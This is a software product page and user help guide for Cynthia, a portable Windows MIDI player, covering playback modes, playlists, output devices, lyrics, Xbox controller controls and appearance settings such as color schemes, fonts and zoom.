Type

Desktop App (Standard Edition)

License

MIT

Status

Release Date

9th November 2025

Portable App

Yes

Code Foundation

4th Generation (Gossamer for GUI)

Operating System(s)

Windows All and Wine for Linux and Mac

SHA256 Checksum

for "cynthia.exe"

8B9CAB404E174767144C13A32C7357FDF320EA6D632069E68AFC10F107F98F38

Downloads

Images

Cynthia playing through her sample midi music


Cynthia displaying her menu


Realtime display panels Visual (Tracks, Channels, and Notes), Piano and Bars visible


Cynthia in her traditional view - Navigation, Information and Settings panels visible


Easily adjust channel volumes on-the-fly with the integrated mixer - hover over/tap the Channels panel to show/edit


Cynthia in the "Deep Orange 2" color scheme (Options > Color) and "Swell" animated background scheme (Options > Background), with Compact mode on (Options > Settings > Compact)


Online Help

Running Cynthia for the first time Several sample midis built-in.  When starting Cynthia for the first time, these sample midis are listed in the " Play Folder" panel, and playback is automatic.

At any point during playback, you may select another midi from the list.  Playback seamlessly switches to the selected midi in question.

Cynthia supports realtime changes to settings during playback.  This means you may adjust the Playback Mode, Playback Device, Volume and Speed without having to stop/restart playback.

Main toolbar links and their function The main toolbar is located near the top of Cynthia's window.  From left to right, it has the links of:

Nav - Toggle display of navigation panel
Play Folder - Show the "Play Folder" panel to play midis from a folder
Play List - Show the "Play List" panel to play midis from a playlist
Prev - Play previous midi file in list
Rewind - Shift playback position back several seconds
Stop - Stop playback
Play - Toggle playback: When playing ( flashing) playback stops/when stopped ( static) playback starts
Fast Forward - Shift playback position forward several seconds
Next - Play next midi file in list
Menu - Show menu
Mixer - Show the Windows Mixer app
Options - Show the Options window, to change Cynthia's appearance
Help - Show (from rightmost column) or hide built-in help

How to play a list of midis in a folder From the main toolbar click " Play Folder" link (top left) to display the "Play Folder" panel.

With Play Folder, there is no need for a playlist or setup.  Just navigate to the folder in question and instantly play the midis within.

Double click the " Home" entry at top of list (scroll up if not visible).  The list will refresh with the names of your hard drives, pen sticks and other local storage devices.  Double click a drive, then the subsequent folder(s) to the one that you want to play.

The list will update.  Double click a specific midi to begin playback, or, click the " Play" link.

Toolbar Links
Refresh - Refresh the playback list
Fav - Show the "Favourites" window.  Use this handy window to maintain a list of your favourite folders for quick access.
Back - Go to the previous folder in navigation history
Forward - Go to the next folder in navigation history

Tips :
There is no need to stop playback before switching to another folder.  Double click the new folder and wait several seconds for Cynthia to automatically recommence playback.

The current folder will be remembered when Cynthia is restarted.

How to use a playlist to play a selection of midis The standard ".m3u" playlist format is supported.  This is a plain text file that contains the length of the midi in seconds, a title, and the location of each midi.

Cynthia supports midi playback from local storage devices, such as hard disks, pen sticks etc.  Internet urls are not supported.

If you already have a playlist in the m3u format saved on your disk, you can open it in Cynthia for playback.  From the main toolbar click the " Play List" link (top left) to show the Play List panel.  An additional toolbar presents.  Click the " Open" link (if shown) or " Edit > Open".  From the Open window, navigate to your playlist, select and click the "Open" button.

The contents of your playlist will load inside the Play List panel.  Click the " Play" link to begin playback.

How to make a playlist There are several ways a playlist can be constructed.  The first method is the easiest.  From your computer explorer ("File Explorer" in Windows and "Files" in Ubuntu) navigate to the folder of midis.  Highlight one or more midis files inside the folder and drag the selection onto Cynthia and let go of the mouse button.  The " Play List" panel updates and displays the dropped midi files appended, to the list.  Repeat this process for as many midi files as required.

At anytime you may save the playlist.  From the Play List toolbar, click the " Save As" link (if shown) or " Edit > Save As...".  Type a name in the Save window and click the "Save" button to save the playlist.

It is worth noting that each time Cynthia saves your playlist to file, the midi files referenced inside it have their names adjusted automatically to work with the specific save location of the playlist.

Most midi filenames in a playlist are relative, as they do not have the full drive, folder and filename, but rather a partial folder structure and the midi's name.  This is to permit the movement of the midis and the playlist from one location to another without the need for the playlist to be specifically rewritten.

If you are curious at what the playlist format looks like, click the " Copy All" link (if shown) or " Edit > Copy All" to copy the entire playlist to Clipboard.  Note Cynthia will use a full filename for each listed midi file, since the Clipboard cannot be referenced from a disk location.  You may paste it into any text editor to view, modify, or rearrange the order of the midi files listed.

To paste an altered playlist back into Cynthia, click the " Replace" link (if shown) or " Edit > Replace".  The Play List panel will update.

Cynthia has support for extended playlists.  Note!  A large playlist of 100,000+ midi files will use about 102MB of RAM and require a second or two to apply midi filename adjustments.

Support for playlist filtering is provided.  An example:  You may instruct Cynthia to list only ".mid" files by deselecting ".midi" and ".rmi" options from the "File Types" option panel (right column).  The playlist itself remains unchanged - how Cynthia uses it changes.

Toolbar Links
Edit - Show edit menu
New - Prompt to clear playlist
Open - Open a playlist from file
Save As - Save playlist to file
Cut - Cut selected playlist item to Clipboard
Copy - Copy selected playlist item to Clipboard
Copy All - Copy entire playlist to Clipboard
Paste - Add Clipboard playlist to end of current playlist
Replace - Replace current playlist with Clipboard playlist
Undo - Undo last change to playlist

Tips :
The current playlist is remembered for next time Cynthia is started.

To show or hide the above toolbar links, tick or untick the " Edit > Show Links on Toolbar" option.  Unticking the option hides all links except " Edit" and " Paste".

Which playback method to use? Play Folder or Play List? If you're a lover of simplicity itself, wishing only to play midi files directly from your hard drive folders as is, or, you're a playlist fan, rest assured, switching between these two very different playback systems, is as easy as a single click on either the " Play Folder" or " Play List" links.

Whilst the Play Folder method is limited to playing only the files contained in the currently selected folder, there is zero setup, no list to be built, and playback can start without hassle.

The Play List method on the other hand allows for a far more in depth custom playback experience.  It supports the playback of midis across multiple disk drives, folders and in any assembled order.

Additionally, Cynthia's large capacity list can easily handle a very large playlist.  For example a playlist of 10,000+ midis is just fine.

And switching between these two playback methods can be done during playback without issue.

Tip :
The playback options File Types, Playback Mode, Playback Device, Speed and Volume are shared between both playback systems, and do not change or require adjustment after a switch.

Option: Playback Mode Located bottom of left column.

Playback mode (bottom left) determines how Cynthia plays the list of midis in the Play Folder or Play List panel (left column).

Once
Play currently selected midi to the end, and stop playback.

Repeat One
Repeat the currently selected midi without stopping playback.

Repeat All
Play each midi in turn, working down the list (left column), then restart from the top.  Playback initially starts at currently selected midi.

All Once
Each midi in the list is played working downward through the list.  Playback stops at the end of the last midi.

Random
Continuously play a midi, selecting each new one randomly from the list.

Option: File Types Located towards bottom of right column.

There are three midi file types supported: ".mid", ".midi" and ".rmi".  The first two are identical file formats, only the file extension differs.  The third format, ".rmi", is slightly different and contains additional multimedia information for Microsoft Windows.

By default all three file types are selected (lit black).  In this state, all playable midi files are listed in the Play Folder and Play List panels.

To restrict the file types to be played back, click the file type to deselect it.  The list of midis (left column) updates to reflect the change.

If all three options are deselected, Cynthia interprets this as if all three were selected.

Option: Playback Device Located towards bottom of right column.

By default all midi playback is sent to the Windows Midi Mapper system - the default Windows midi note handler.

If you have more than one midi device installed on your computer, Cynthia can redirect the midi notes to that device instead.

Traditionally, a midi device had been considered to be hardware.  But now, with the advent of powerful computer hardware, software can now act as virtual hardware, allowing for advanced features to be included on your computer without the need for hardware upgrades or physical adjustment.

A midi software driver can support a soundfont, which can greatly enhances the playback quality of a midi through it's support for large, high-quality, instrumental sound libraries.

To change the playback device, select a number in the playback device control (bottom right).  Up to ten devices (1-10) is supported.  "Map" is the Windows Midi Mapper.  Selecting a dash will cause playback to stop producing audible sound (no device selected for sound output).  In this case, the last usable (numbered) midi device will be automatically selected after a short time delay, recommencing audible playback without the need for user input.

Cynthia supports realtime device switching during playback.  A small, momentary interruption to playback may occur during a device change.  The name of the device in use by Cynthia is listed in the playback device control (bottom right), for example as "Playback Device: Midi Mapper".  In later versions of Microsoft Windows the Midi Mapper was discontinued - in this case, Cynthia uses the first installed midi device.

It is worth noting that using another device may require a separate adjustment to that device's volume control, some devices do, and some do not.  If it does have a volume control, it is more than likely to be accessible via Windows "Volume Mixer" application.  Click the " Mixer" link from the top toolbar to display the application and adjust the volume control of your device accordingly.

Option: Speed Located towards bottom of right column.

By default, Cynthia plays back a midi at normal speed (100%).  Drag the slider to the right to increase the playback speed up to a maximum speed of 1,000% or 10x normal speed.

To slow down playback speed, drag the slider to the left.  A value less than 100% slows playback to less than normal speed.  The slider can go as low as 10% or 1/10th normal playback speed.

Playback speed may be adjusted at any point during playback.  All changes take place in realtime.  An auto-fade in feature momentarily quietens playback to avoid any sudden or unexpected notes.

Option: Volume Located at bottom of right column.

For maximum compatibility between different operating systems and device types (hardware and software) and their capabilities, Cynthia employs a multi-layer volume control system which adjusts both hardware and midi note volumes.

To adjust playback volume, position the slider to the right to increase the volume and to the left to decrease it.

An increase above 100% boosts the midi volume, making low-level, hard to hear midis, more discernable.

Option: Playback Progress Adjust playback position with a single click or tap.  Additionally, hovering a mouse cursor over the Playback Progress bar displays a vertical marker for the new playback time and position.  Click to apply new position.  The midi playback will shift to a new position and automatic fade in eases back playback volume to avoid sudden clicks, pops or abrupt notes.

Use keyboard arrow keys to progressively move forward or backward through the midi.  A vertical marker will display.

Not currently playing?  Click in the Playback Progress bar to commence playback at that position.

Lyrics Synchronised lyric display is supported for midis with lyrics.

To enable lyrics, from the main toolbar click the " Menu" link and tick "Show Lyrics".

When included within a midi, lyrics are displayed inside the Playback Progress bar (bottom of Cynthia) as "Playback Progress - Lyrics:" with several words or part words visible at any one time.

A midi without lyrics will display "Playback Progress".

If hyphenated lyrics are required in order to highlight the pauses between part-words, from main toolbar click the " Menu" link and tick "Hyphenate Lyrics".

Always on Midi Sometimes there can be a short, noticeable playback delay when commencing playback, initially.  This delay is preparation time for Cynthia to ready playback.

There is no delay switching between midis during playback as Cynthia remains connected to the midi device.  By default, after a short period of no playback (5 seconds or more), the midi device will switch to offline, and a short delay will occur when playback is next started.

To avoid this delay, the "Always on Midi" option may be used to keep a midi device online, even when Cynthia is not playing.  From the main toolbar click the " Menu" option and tick the "Always on Midi" option.

Tip :
You can always tell if the midi device is online or not - from the "Midi Information" panel on the right.  Look for the item called "Device" in the "Technical list".  This will either be "Online" or "Offline".

What midi formats are supported? Midis comes in various format types.  The simplest is format 0, a single track format, that stores all it's tempo (speed), notes and commands on a single, mixed track.

A format 1 midi, on the other hand, uses a dedicated master track (first track) to store all of it's tempo (speed) commands for the entire midi.  Notes and commands are stored separately on additional, multiple tracks.

Cynthia supports both format 0 and format 1 midis with file extension ".mid", ".midi" and ".rmi".

A third, format 2 midi exists.  This format type is not supported by Cynthia.  In addition, Cynthia does not support system exclusive messages.  These messages will be ignored, and typically relate to manufacturer specific equipment.

Using an Xbox Controller to control Cynthia Cynthia must be setup to use an Xbox Controller.  From the top toolbar select "Menu > Xbox Controller" and select the "Active Only" or "Active and Inactive" option.  Pair an Xbox Controller to your computer (if not already done).  Cynthia automatically detects and uses active Xbox Controllers.  More than one controller can be used at the same time.


1. Left joystick - left/right to adjust volume, push down to toggle between Play Folder and Play List modes
2. D-pad - left/right to switch midi playback device, up/down to switch between songs in navigation panel
3. View button - Go to beginning of song
4. Share button - Not used
5. Menu button - Toggle through playback modes: Once, Repeat One, Repeat All, All Once, and Random
6. Right joystick - left/right to change song playback position, push down to toggle full screen mode
7. Left bumper (top) - toggle display of navigation and piano panels
8. Right bumper (top) - toggle display of midi information and tracks, channels, and notes combination panels
9. Left trigger (bottom) - reduce playback speed
10. Right trigger (bottom) - increase playback speed
11. X button - reset playback speed to 100%
11. Y button - reset volume to 100%
11. B button - start/stop playback
11. A button - select folder in navigation panel (when in Play Folder mode)

Change the coloring of the app's GUI From top toolbar click " Options" or app menu "... > Options" (top right of window).  An "Options" window will display.  Select " Color" tab to show list of color schemes.

The "Color Schemes" list is split into three sections:
1. Built-In color schemes - read only/use as is
2. Custom color schemes - user customisable and labelled Custom 1-10
3. Saved color schemes - user customisable and saved as file(s) on disk

There are 160+ built-in color schemes to choose from.  Simply select a color scheme to apply in realtime.  For instance, Aqua Marine.  Watch as the app's GUI changes color instantly - no need for an additional load, apply, or set.

A Blaiz Enterprises' color scheme (*.bcs) at its core is a list of twenty colors, responsible for coloring most aspects of the app's GUI.  Some specialised colors are derived automatically from these.  Two colors for the frame, nine for important areas, Title colors, and nine more for common zones, Standard colors.

Each built-in color scheme has it's own unique set of colors.  A custom color scheme allows for colors to be customised.  To create a custom color scheme, scroll down the list to the section titled "Custom".  He you'll find ten custom color scheme slots - each fully customisable in realtime without any need to be named, saved or applied.  Tap or click on a slot to start - for example slot 1 - "Custom 1".

On the right a series of editable color palettes will appear.  Click a palette to display the color dialog window.  Adjust color as desired and click OK when done.  Alternatively, click and drag your mouse cursor/fingertip from the color palette to acquire color from your computer screen in realtime.  App GUI continuously updates to reflect changes in color.  All changes are automatically saved.

Give your new color scheme a name Want your shiny new color scheme to have its own name?  Easy.  From the color schemes list - click "Options > Color" to display dialog - scroll down to the "Custom" section, select your custom color scheme, and click " Menu > Save As...".  Type a name and click the "Save" button.  Your color scheme is saved to disk and listed under the "Saved" section of the color schemes list - next section down.

Any color scheme can be saved to disk, and then edited.  For instance, you can select one of the built-in color schemes, such as Aqua Marine, and save it to disk, then customise as desired.

How to use your named color scheme Click "Options > Color" to show the color schemes list.  Scroll down to the last section named "Saved".  This section presents a list of all your saved color schemes in one central location.  Select a scheme to use.

Can I edit my saved color scheme without having to re-save it/load it etc? Yes.  Any saved color scheme can be customised without fuss.  Click "Options > Color" and scroll down to the section named "Saved", click the color scheme you wish to edit, and adjust the color(s) as desired.  All changes are saved automatically back to the file on disk, without any need to explicitly save.

What is a background scheme A background scheme is a static or animated image tiled across the background layer of the app.  The app's GUI components sit above this layer/merge into it, such as toolbars, tool images, buttons, text etc.  There are 60 built-in background schemes, based on several images with different presets, like horizontal and vertical scroll speeds, fade in and out rates, and wobble levels.  These functions allow for a static image to give movement to the app.  While some background schemes are specially set for animation, others are not.

The background image can be rendered in full color, or shade-shifted toward greyscale, or shade-shifted toward the app's current highlight color.  One slider, Colorise, controls this tri-function.

A background scheme supports a maximum image color depth of 32 bits in RGBA format - 8 bit red, green, blue, and alpha channels - for instance a transparent PNG image.

Note :
An animated background scheme can operate at frame rates of up to 20 fps (frames per second), which means the entire GUI of the app is repainted in full, 20 times per second, like a video, and therefore can consume quite a bit of CPU power, especially at high resolutions.  It is recommended a modern, powerful machine be used for high frame rates/resolutions in order to maintain smooth operation of the GUI.

Sliders and their meanings :

Strength (0..255):
Determines how much of the background image is seen/made visible.  A low value renders the background subtly beneath the GUI, whereas a high value, 100-255, renders it boldly.  A value above 100 is disabled by default.  To enable, click "Options > Settings" and deselect "Display > Safe Background".  A value over 100 may overpower the GUI making it hard to navigate or operate.  If this becomes the case, press the "F2" key, and then the Enter key to confirm restoration of the app's default settings.

Colorise (-100..100):
Set the color rendering method.  A value of 100 renders the background image in full color, a value of 0 in greyscale, and a value of -100 in the app's current highlight color.

Speed (0..20):
Paint speed in frames per second.  0 is static - the background scheme only repaints when required.  This is the least stressful option.  A value of 1-20 sets a constant repaint cycle of 1-20 fps (frames per second).

Horizontal Scroll/Vertical Scroll (-100..100):
Moves background image left/up (minus value) or right/down (plus value) by X pixels.  A value of zero turns movement off.

Horizontal Wobble/Vertical Wobble (0..300):
Applies a wobble factor to the above Horizontal Scroll/Vertical Scroll movement(s).

Fade In/Out (0..50):
Cycles through a high-to-low-to-high intensity flow, gradually fading the background image from view, then back again, in a continuous cycle.  Use a low value for a slow cycle, and a high value for a fast cycle.

Fade Wobble (0..200):
Applies a wobble factor to the Fade In/Out flow cycle above.

Can I customise a background scheme/background image Yes you can.  There are 10 custom background scheme slots.  Click "Options > Background" and scroll down to the section named "Custom".  For instance, click on "Custom 1".  A sub-toolbar will display in the right column at the top.  From there, you can paste in an image from Clipboard - click "Paste", or open an image from file - click "File".

For best visual results, your image should be a similar size to the app's overall area, and be prepped for tiling work - that is, have it's right and bottom edges modified so that its colors/pixels seamlessly wrap back round to its opposing edge (right-to-left and top-to-bottom).  You can use a tile creation app, or a good quality graphics app to accomplish this, or use our "Blend It" app to prep your image.

Without this, tiling the image may present abrupt edges of unwanted opposing lines of horizontal/vertical colors, and be visually jarring in nature.

Adjust the sliders as required to accomplish animation and visual effects.  All changes to the image and sliders are saved in realtime.

How do I change the frame style, size and sparkle strength/effect? The frame on our apps have a long history reaching back to the late 1990s, where they first adorned our FastCards and PowerCards (still/animated electronic musical greeting cards).

In the context of an app, they primarily serve as a large, easy-grip area for resizing the app's overall size, and a touch of decoration to boot.

A frame can be made wide or narrow as required.  The modern app has a typical frame width of 7 px in a plain style, so as not to distract or occupy excessive screen real estate.

Furthermore, a frame may render with an optional, randomised sparkle effect, with a range of 0 (no sparkle) to 20 (heavy sparkle).

Click "Options > Frame" to edit the app's current frame settings.  A list of 50 built-in frames is available to choose from, ranging from Antique to Traditional 5.

Toward the bottom of the window are two sliders to adjust the frame's Sparkle (strength) and Size (width in pixels).  A frame can be sized from 0 px (no frame) up to a wide frame of 72 px.  All changes update in realtime.

Automatic zoom and scaling of app text and images on high resolution displays Click "Options > Font" to display zoom and font specific settings.  By default, the app is set to automatic zoom, which means it will scale up its text and images if the monitor it's displayed on is above 2K in resolution.

Why scale text and images at all?  What is special about 4K and 8K monitors?  At first glance it may not be obvious the significant difference between standard 2K resolution, and the much higher 4K and 8K resolutions.

But high resolution monitors, such as 4K and 8K displays have far more pixels (colored dots) per inch on screen than previous generations of monitors, that is, the screen size may be the same but more dots are packed into the same area.  Consequently, an app without scaling abilities may appear small or even blurred on these monitors.  That's because as new monitors and TVs gain ever greater resolutions, statically sized apps shrink in size/fail to compensate.  This is why a modern app must be able to scale up to match the appropriate resolution.

Here is a comparison of common display resolutions:
2K = 1920w x 1080h =  2,073,600 pixels
4K = 3840w x 2160h =  8,294,400 pixels
8K = 7680w x 4320h = 33,177,600 pixels

A 4K (ultra high definition) monitor uses four times (4x) more pixels than it's 2K (full high definition) counterpart.  A statically built app without scaling would shrink to 50% of it's size, making it difficult to use.  An operating system may attempt to counter this by scaling it up using pixel stretching - very much like zooming up a photo - unfortunately this tends to blur the appearance of the app.

The same app on an 8K monitor would suffer even greater shrinkage, rendering at only a quarter (25%) of it's original size, or scaling with significant blurring.

This app has a built-in zoom mode, which multiples the width and height of its text and images by a factor of 2, 3, or 4, dependant on the resolution of the display.  This does away for the need of the operating system to stretch/scale its pixels.

On a 2K monitor there is no need to scale as this is the app's intended resolution.  On a 4K monitor the app switches to a zoom factor of 200% (2x), upscaling text and images and the main window's dimension accordingly, and 400% (4x) on an 8K monitor.  The end result is an app that appears appropriately sized over different monitor resolutions.

You can override this automatic zoom function, and set your own zoom value of: 100%, 200%, 300%, or 400%, if desired.  An option that may be useful on a custom display resolution, and/or multiple monitor display environment.

Note :
Setting the zoom value to 300% or above on a 2K monitor may render the app so large as to make it unusable.  If this occurs, you can press the "F2" key at anytime to restore the app's default settings.

Change app text size The text size (font size) can be set between 6 and 24.  Click "Options > Font" and choose a size option.  Any change updates the app text in realtime.

In some instances, the app may display slightly larger or smaller text in special areas, however this text is directly scaled from the size set.

By default the app uses a size of 10.

Note :
Not all sizes are supported by all fonts.  On Ubuntu for instance, a large font size for Arial can cause text to appear weird or slightly off.  If this occurs, try reducing the font size a tad, or alternatively select another font (font name).

Change app font A font determines what sort of characters appear on the screen, and in what style.  Click "Options > Font" and choose a font name (font) from the list of options, from Arial to DejaVu Serif.  Any change updates the app in realtime.

Older fonts like "System" were simple formats constructed from small images or bitmaps, one per character, and did not scale up very well, partly because to save on memory, not all character sizes were stored inside the font.  Today, modern fonts use mathematical vectoring to draw shapes and lines etc to construct characters on the screen, though the infrastructure and overhead required for such fonts can be complex and heavy on a computer system.  But because these fonts employ mathematics to draw their characters, they do scale up well.

Eleven common font name options are presented for best compatibility and visual appearance, taking into consideration operating systems as old as Window 95, through to modern-day Windows 11, and other systems such as Mac and Linux.

In general, you want a font that is widely supported and guaranteed to render well on most computers.  Bearing that in mind, Arial, is a good choice, as it is widely supported by operating systems going as far back as Windows 95, if not further.

If a font name is selected but is not supported by the current computer, for example "DejaVu Sans" - not supported by Windows 95 - a close approximate/fallback font is used instead.

For a specific/custom font, click the "Custom" option once to switch it on, and click it again to display a Font dialog.  Choose the font name from the list of fonts and click the "OK" button when done.

If the app becomes unreadable, or hard to read after choosing a new font name - it can happen with a bad font, a foreign language font, or a symbols only font like "Wingdings" - press the "F2" key to restore the app's default settings.

Change app font feathering/antialiasing For maximum font compatibility, two completely separate methods have been employed to render text with antialiasing.

Click "Options > Font" for font settings.

1. The first method, Font Feathering, is a simple feather designed specifically to outline each text character in realtime.  This has the effect of gently softening the often harsh outline of text characters on LCD screens, which by their nature do not blur neighbouring pixels, as the older CRT (Cathode Ray Tubes) did.

The feather is universally applied to both bitmap fonts (older image based fonts) and vectors fonts (newer mathematical fonts).  In this way it allows for a quick and direct text feathering technique, that is easily adjusted to suit, without any need for any complicated or tricky multi-step setup configurations and/or processes.

As a bonus, it works on older operating systems - e.g. Windows 95 - which back in the day had no need/support for it, as LCD monitors were not widely used.  It also works on fonts that don't have any embedded feather information, or for smaller font sizes that at times can abruptly discontinue feather support.

This method generates an even, edge-based blurring of the outermost pixels of the text characters.  A high value - high or ultra - renders a strong/bold feather, and a low value reduces this to a more subtle display.

Any change updates in realtime.

On a high quality computer monitor were all pixels are transmitted and displayed without any color loss, a "Low" value is typically sufficient to render text gently on the screen.  But TVs, which tend to heavily compress their video streams for speed loose some color information and therefore may require a higher setting of "Medium" or "High" for similar results.

2. The second method, Font Specific Antialiasing, relies on the font itself to provide all feather based information.  This is usually an 8 bit greyscale range of 0-255.  The downside is, if the font has no feather support, or the operating system is old, e.g. Windows 95, then no antialiasing will appear.  This method can sometimes be hit and miss.

For instance, take the font Arial, it is universally supported, but surprisingly looses feather support at 12 pt or less, leaving only sharp text characters to be rendered on screen.

To adjust the antialiasing strength, select an option from "Dark" (strong) to "Light" (subtle).

By default, options 1 and 2 above are set to "Low/Dark", which provides the best fit for a wide variety of fonts and their behavior over a broad spectrum of old and new operating systems.

App startup style The app can be set to start up in various ways: normally, minimised, maximised or in fullscreen mode.  To adjust, click "Options > Settings" and set an option under "Start Style".

Normal:
Starts the app as a window, which is the default mode.

Minimised:
Starts the app hidden from view as a button on your taskbar.

Maximised:
Starts the app as a window, maximised to fill all the available work area on your desktop.

Fullscreen:
Starts the app in fullscreen mode, blocking out everything else on your desktop.

Note :
If the app has the "Multi-Monitor" option selected (next section down named "Display"), then modes "Maximised" and "Fullscreen" will render the app over the combined screen real estate of all monitors.

Create a link to the app on your Start button and Desktop, and the Automatic Startup option The app can create, maintain and remove links for you.

There are three link types supported:
1. Start button
2. Desktop
3. Automatic Startup

Click "Options > Settings" to adjust.

1. The first link type, Start button, creates and automatically maintains a link - also known as a shortcut - on your Start Menu called "Cynthia by BlaizEnterprises.com".  As this link is created by and maintained by the app, you must unselect the option to remove the link from your Start Menu.

2. The Desktop link operates identically to the above, maintaining a link on your Desktop named "Cynthia by BlaizEnterprises.com".  It also must be unselected to remove the link permanently from your Desktop.

Note :
As long as either options 1 or 2 above is selected, then the corresponding links are maintained and automatically re-created if need be by the app, even if they're manually deleted from outside the app.

By default, neither option is selected.  Optionally, you can create your own manual link/shortcut to the app using Windows with any name/label you wish.

3. The last option, Automatic Startup, creates a link to the app in the startup location of your computer, informing Windows to launch the app when your computer boots/starts up.  Again, this link is automatically maintained, therefore unselect the option to remove it.

Note :
If any of the links above are selected and you plan to remove/delete the app from your computer, it is highly recommended you first unselect all the options above (1-3), then remove/delete the app.  Otherwise, Windows can get a little weird and put the links back in some cases without any interaction from the app itself, even if the app is no longer present.  This behaviour was observed with earlier versions of Windows 10.

A few important app settings explained The majority of the app's important system settings can be found in one location - click "Options > Settings".

An option is considered "on/enabled/selected" when lit, and "off/disabled/unselected" when unlit.

Round Corners:
Render all visual controls, windows, and dialogs with round (curved) corners.

Soft Close:
Automatically close an active dialog window when a click/tap strikes outside the window area - e.g. Save, Open, Font, Options dialogs.  This can speed up typical workflows by skipping the need to specifically click the OK or Cancel buttons to close the dialog.  For instance, click "Options" to display the options dialog, change a few settings and click/tap outside the window to close it and save changes.  Also convenient to cancel a dialog displayed by mistake/change of mind, such as a Save dialog.

Safe Area:
Retains app window on screen at all times, and any sub windows or dialogs within the app.  Any attempt to drag the app out-of-range triggers an automatic position correction - a passive system that continuously checks the window position and monitor size.  Supports both single and multi-monitor modes.

Show Splash:
Displays an informative/artistic splash screen on app startup.  Unselect to disable.

Realtime Help:
Scrolls control-centric help across the top of the current window, dialog, or menu.  Hover mouse cursor over / tap finger on a control for related help.

Hints:
Hover mouse over / tap finger on a control to display help related information in a popup bubble

Touch:
Comfortably enlarge controls and menus for touch access (finger taps)

Double Clicks:
Some options work best with a double click / tap for confirmation.  This option supports the traditional double click mode.  For example, navigating a disk drive using a double click / tap to switch between folders.

On Top:
Set the app above all other apps and windows

Economy:
Normal app operation can use a lot of paint cycles and CPU power, especially if it's rendering graphics and effects continuously on the screen.  Economy mode throttles back this usage during periods of extended idleness, e.g. when there is no direct app keyboard input, or indirect mouse cursor movement or finger taps.  For more specific information refer to the topic "Economy mode".

32bit Graphics:
Not noticeable on today's powerful computers with their 32 bit monitors and video cards, it however can deliver a small performance improvement on older computers running 24 bit graphics

Frame Maximised:
Show the app's frame whilst maximised.  The frame is always hidden whilst in fullscreen mode.

Safe Background:
An optional static or animated background scheme can be set, which renders an image beneath the GUI.  If this image is too bold / strong the GUI can be hard to view / use.  By default this option limits the background strength to a safe maximum level of 100.  Unselect this option to permit the full range of background strength (0-255).  If the GUI becomes hard to use or unreadable, press the "F2" key at anytime to restore the app's default settings.

Multi-Monitor:
Permit the app to span the full range of attached monitors when maximised or in fullscreen mode.  By default the app spans the current monitor only.

Center Title:
Position the name of the app in the center of the app's window header

Toolbar Alignment:
Align the content of all participating toolbars to the left, center, or to the right

Color Contrast:
Color coordinate important system settings and options into color specific input panels for rapid visual identification

Monochromatic Images:
Use high-contrast, color-adaptive, monochromatic tool images on the app's GUI

Highlight Above:
Retain highlight areas and other important GUI zones whilst a background scheme is in use

Brightness:
Adjust the brightness of the entire app, from 60 being the darkest right up to 130 being the brightest.  Any change takes affect immediately.  The default brightness is 100.

Unfocused Opacity:
Renders the app translucent upon loosing focus - e.g. when another app is in use.  Available range is 30 almost invisible, through to 255 fully visible.  Default value is 255.  This feature requires support of a modern operating system and is therefore not supported by Windows 95/98 etc.

Speed:
The speed by which to transition the app from a focused state to a non-focused state or vice-versa.  Speed range is 1-10, where 1 is the slowest and 10 the fastest.

Focused Opacity:
Renders the app translucent upon gaining focus - e.g. when the user interacts with it.  Available range is 50 almost invisible, through to 255 fully visible.  Default value is 255.  As above, this feature requires support of a modern operating system and is therefore not supported by Windows 95/98 etc.

Cursor:
Change the default cursor to one of the built-in cursors, each of which scale from small to large, according to the current size set by the operating system.  A range of static colors are available: Red, Orange, Pink, Yellow, Purple, Aqua, Blue, Green, Grey, Black, White, along with Default and Custom.

In addition, two dynamically colored cursors are included: "Adaptive - Hover" and "Adaptive - Title".  These special cursors acquire their color from the current color scheme.  Any change to the color scheme is reflected in the color of the cursor.

The custom cursor option supports both static cursors ".cur" and animated cursor ".ani" file formats.  To use, select the "Custom" option.  The cursor will update if previously customised.  To change the cursor, click the option again and select a cursor from file using the Open dialog.

Frame Sparkle:
Applies a random texture to the app's frame.  Select a value from 0 (off) to 20 (bold).

Frame Size:
Adjust the app's frame size (width in pixels) from 0 (none) to 72 (wide).  The default frame size is typically 7.

Scrollbar Size:
Set the width and/or height of the app's scrollbars.  A value of 5 (thin/short) to 72 (wide/tall) is supported.

Wine Compatibility:
Wine is basically a large computer instruction conversion app, which allows an app designed for Microsoft Windows to execute its instructions "run" on another operating system, such as a Mac or Linux.  Because Wine does not emulate / bridge any logic gaps and only translates an app's instructions, the underlying computer hardware must match that used by Microsoft Windows - namely Intel and AMD64.

A notable exception to this requirement is the modern-day Mac, e.g. Mac Mini, which runs an Intel emulator under the hood.  This allows a Microsoft Windows app to run by the following sequence: App to Wine to Intel emulator to Apple hardware.  Incredibly, this appears to be a very effective and rather efficient strategy, especially for our lightweight apps.

Although Wine's functionality is both wide and impressive, there is some functionality that falls short of Windows.  The Wine Compatibility option compensates where possible for important shortcomings, such as volume handling, and allows the app to maintain functionality.

The default option is automatic and detects the presence of Wine based on the existence of drive "Z:\".  For more information on Wine refer to their website www.winehq.org .

Restore Defaults:
Easily reset the app's system settings, such as color, font size, zoom level etc to their defaults.  Click the "Restore Defaults..." button at the bottom-right of the Options window or press the "F2" key at any time in the app to display the "Restore Defaults" confirmation prompt.  Confirm your intention to reset and then click the "Restore Defaults" button.  The app will reset to default values.

An app typically has settings in addition to these which are not restored / reset.  Instead, they should be adjusted via the app itself as required.

On Top - Position app above other apps and windows Click the app menu button (top right) and tick "On Top" option.  Alternatively, click "Options > Settings" and select "Display > On Top" option.

Don't show the splash screen on app start By default the splash screen is displayed with a momentarily pause on startup.  This can be switched off by going to "Options > Settings" and deselecting the "Display > Show Splash" option.

Where is my app? / Show the app folder Because this app is portable, you might not remember / know where it is located on your hard disk or usb pen stick.  To access its folder, click the app menu button (top right) and select " Show App Folder".  An explorer window will display with the app's binary (*.exe) and storage folder listed alongside.

Economy mode Running an app at full speed when it's not being used can be a bit wasteful, and may prematurely drain the batteries on your laptop or tablet.  Select this option to automatically throttle back battery / power consumption and CPU / graphic loads after a short idle period of 10 minutes.  At which point the app will reduce its paint cycles down to 2 fps at a maximum.  And a further reduction at 30 minutes to 1 fps.

Internal processing loads will typically be reduced also, lowering the demand on your CPU and batteries further.

A single stroke of the keyboard directed at the app, or a global mouse click, or tap of the finger will instantly disengage the current economy state and return the app back to full operation.

To enable, click "Options > Settings" and select "Display > Economy" option.

Some technical limitations of this app The Gossamer Code Foundation - our 4th generation codebase - which powers this app has been engineered with care and patience to a high level of quality and reliability.

As our code is rather unique and almost entirely custom built, there are some technical limitations which make our apps incompatible with some extended features of modern operating systems.

